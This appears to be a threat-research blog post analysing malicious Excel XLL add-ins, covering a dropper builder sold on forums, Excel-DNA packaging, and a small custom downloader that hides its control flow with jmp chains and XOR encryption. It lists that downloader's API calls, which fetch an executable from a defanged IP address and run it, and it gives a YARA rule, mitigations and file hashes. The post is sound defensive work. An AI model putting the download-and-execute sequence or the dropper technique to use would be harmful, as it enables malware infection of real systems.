How Attackers Use XLL Malware to Infect Systems

In recent months, we have seen a growth in malware campaigns using malicious Microsoft Excel add-in (XLL) files to infect systems. This technique is tracked in MITER ATT&CK as T1137.006. The idea behind such add-ins is that they contain high-performance functions and can be called from an Excel worksheet via an application programming interface (API). This feature enables users to extend the functionality of Excel more powerfully compared to other scripting interfaces like Visual Basic for Applications (VBA) because it supports more capabilities, such as multithreading. However, attackers can also make use of these capabilities to achieve financial objectives.

In the campaigns we saw, emails with malicious XLL attachments or links were sent to users. Double-clicking the attachment opens Microsoft Excel, which prompts the user to install and activate the add-in.

Figure 1 – Prompt shown to user when opening an XLL file.

Attackers usually place their code in the xlAutoOpen function, which is executed when the add-in is immediately activated. What makes this technique dangerous is that only one click is required to run the malware, unlike VBA macros which require the user to disable Microsoft Office’s Protected View and enable macro content. However, XLL files are portable executables that follow the format of dynamic link libraries (DLLs) which many email gateways already block. We recommend organizations consider the following mitigations:

  • Configure your email gateway to block inbound emails containing XLL attachments.
  • Configure Microsoft Excel to only permit add-ins signed by trusted publishers.
  • Configure Microsoft Excel to disable proprietary add-ins entirely.

XLL Malware for Sale

The rise in XLL attacks led us to search underground forums to gauge the popularity of tooling and services using this file format. We encountered adverts from one threat actor repeatedly, who claimed to be selling a builder that creates XLL droppers.

Figure 2 – Forum post advertising an XLL Excel dropper.

The user specifies an executable file or a link to one and adds a decoy document. An XLL file is generated as output, which can then be used in attacks.

Figure 3 – XLL Excel dropper user interface.

Excel-DNA Generated Add-Ins

Most XLL samples we analyzed have the same structure. Essentially XLL files are DLLs containing an exported function called xlAutoOpen. The most common type of malicious XLL files we see are those generated using a legitimate software project called Excel-DNA. Looking inside an XLL malware sample that follows this structure, you can see it contains several large resources (Figure 4).

Figure 4 – Resources inside an XLL generated by Excel-DNA.

This includes Excel-DNA project components as well as the add-in, which in this case is a malware dropper. You can identify the file that contains the Excel add-in code by looking at the resource names or the XML definition file that is also stored in the resource section.

Figure 5 – Excel-DNA XML definition.

In this sample, the add-in containing the malicious code is developed in .NET and is located in the MODDNA resource. To inspect the code, you first need to save this resource to disk and decompress it using the Lempel–Ziv–Markov chain algorithm (LZMA) algorithm. Since the add-in is a .NET application, we can decompile it to retrieve its source code for further analysis. Figure 6 shows the start function of an XLL add-in we analyzed which acts as a malware downloader.

Figure 6 – Malware .NET malware downloader extracted from an XLL file.

XLL files created using the Excel-DNA project can also be unpacked automatically using a script provided by the project. The script takes the path of the XLL file as an argument and then extracts, unpacks and saves the resources to a folder.

Figure 7 – Excel-DNA extraction script.

Custom Generated Add-Ins

We have also seen other types of XLL malware lately that don’t use Excel-DNA to generate add-ins. One of these samples, a downloader, was particularly interesting because it was tiny (4.5 KB). Like the other XLL files, the file has the xlAutoOpen function exported. To disguise the control flow of the application, many consecutive jmp instructions are executed.

Figure 8 – jmp obfuscation in a custom malicous Excel add-in.

To understand how it works, we remove the jmp instructions and only analyzed relevant instructions. We noticed that encrypted data is located in the file immediately after the executable code. The data is decrypted in a loop that first determines the position and size of the data and then deobfuscates it using an XOR operation. After every 8 bytes the key is multiplied and added to two different constants.

Figure 9 – Decryption loop of custom Excel add-in.

Once the data is decrypted, it contains three DLL names, five API function names, the URL of the payload and the path to the local file where the payload is to be stored. With the decrypted DLL names, the malware first correctly resolves the base addresses by traversing the InLoadOrderModuleList via Process Environment Block (PEB) and then uses them to find the addresses of API functions it wishes to call.

Figure 10 – DLL module address resolution function.

The malware then uses the resolved API functions to download a payload from a web server, store it locally and then execute it. In this example, the malware we analyzed made the following API calls:

  1. GetProcAddress(“ExpandEnvironmentStringsW”)
  2. ExpandEnvironmentStringsW(““%APPDATA%\joludn.exe””)
  3. LoadLibraryW(“UrlMon”)
  4. GetProcAddress(“URLToDownloadFile”)
  5. URLToDownloadFile(“hxxp://141.95.107[.]91/cgi/dl/8521000125423.exe”, “C:\Users\REDACTED\AppData\Roaming\joludn.exe”)
  6. _wsystem(“C:\Users\REDACTED\AppData\Roaming\joludn.exe”)

The custom XLL malware can be tracked using the following YARA rule:

rule xll_custom_builder
{
  meta:
    description = "XLL Custom Builder"
    author = "patrick.schlapfer@hp.com"
    date = "2022-01-07"

  strings:
    $str1 = "xlAutoOpen"
    $str2 = "test"
    $op1 = { 4D 6B C9 00 }
    $op2 = { 4D 31 0E }
    $op3 = { 49 83 C6 08 }
    $op4 = { 49 39 C6 }

  condition:
    uint16(0) == 0x5A4D and all of ($str*) and all of ($op*) and filesize < 10KB
}

Conclusion

Microsoft Excel offers many legitimate ways to execute code, such as Excel4 macros, Dynamic Data Exchange (DDE) and VBA, which are widely abused by attackers. Over the last few months, we have seen malware for families such as Dridex, Agent Tesla, Raccoon Stealer and Formbook delivered using XLL files during the initial infection of systems. To create these files, the attackers most likely use a builder like the one advertised in the forum shown in Figure 1. We found that many malicious add-ins are generated using Excel-DNA, however, some XLL malware we analyzed was custom and made more use of encryption to disguise its functionality. The increasing volume of XLL attacks in the last few months indicates that attackers are interested in exploring this technique, and that we may see more attackers favor XLL over other execution methods in the coming months.

Indicators of Compromise

XLL add-in built using Excel-DNA

380f15a57aee6d2e6f48ed36dd077be29aa3a3eb05bfb15a1a82b26cfedf6160

Custom XLL add-in

c314c7feeb98de6391da83678e1639aade3fbe9c95846b8c2f2590ea3d34dd4f

More XLL hashes can be found in our GitHub repository.

Leave a Comment